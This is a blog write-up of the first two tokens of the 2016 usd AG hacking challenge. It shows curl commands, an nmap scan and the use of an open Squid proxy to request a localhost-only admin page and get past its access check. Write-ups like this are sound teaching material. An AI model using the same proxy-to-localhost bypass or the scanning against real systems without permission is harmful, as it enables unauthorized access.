usd hacking challenge 2016 writeup: tokens 1 and 2

This is part 1 in a series of writeups on the 2016 usd AG hacking challenge.

Introduction

I found the gradual increase in difficulty quite nice in this challenge. The first two tokens were for warm-up.

Token 1 - gotta get our heads just right

Within the first few seconds of this engagement, I had already looked at the HTTP response headers of the site. So there it was, the first token in plain sight:

js@eris:~/usdhc$ curl -I http://82.195.79.113/index.php
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2016 21:55:22 GMT
Server: Apache
Token: 583397
Content-Type: text/html; charset=UTF-8

Token 2 - no place like 127.0.0.1

js@eris:~/usdhc$ curl http://82.195.79.113/restricted/

<!DOCTYPE html>
<html>
<head>
<title>usd Hackertag Challenge Webseite</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" >
[..]
<div id="contentliquid"><div id="content">Token value can only be viewed by local admins.</div></div>
[..]

Only local admins? I did think of what turned out to be the solution right when I read this, but started to poke around aimlessly with cookies, parameters, hidden files etc. first. I even did a fruitless nikto scan. The next morning it occurred to me I had not even done a basic port scan of the challenge site, so without expecting too much I fired up nmap:

js@eris:~/usdhc$ nmap -A 82.195.79.113

Starting Nmap 6.40 ( http://nmap.org ) at 2016-03-19 22:01 CET
Nmap scan report for 82.195.79.113
Host is up (0.022s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: usd Hackertag Challenge Webseite
3128/tcp open  http-proxy Squid http proxy 3.4.8
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: ERROR: The requested URL could not be retrieved
Aggressive OS guesses: Netgear DG834G WAP or Western Digital WD TV media player (92%), Linux 2.6.32 - 2.6.36 (90%), Linux 3.1 (89%), Linux 3.2 (89%), AXIS 210A or 211 Network Camera (Linux 2.6) (88%), OpenWrt 12.09-rc1 Attitude Adjustment (Linux 3.3 - 3.7) (88%), Linux 3.7 - 3.9 (88%), ODROID-U2 Android development board (Linux 3.0) (88%), Linux 2.6.32 (88%), Linux 3.6.10 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 8 hops

Oh, Squid! Let's see:

js@eris:~/usdhc$ curl -sx http://82.195.79.113:3128 http://localhost/restricted/ | grep -i token
<div id="contentliquid"><div id="content">Token value can only be viewed by local admins.</div></div>

Hmm. Seemed I could connect through the proxy, but still no token. How about this:

js@eris:~/usdhc$ curl -sx http://82.195.79.113:3128 http://127.0.0.1/restricted/ | grep -i token
<div id="contentliquid"><div id="content">Token: 134923</div></div>

Home, sweet home.

On to part 2!

Comments !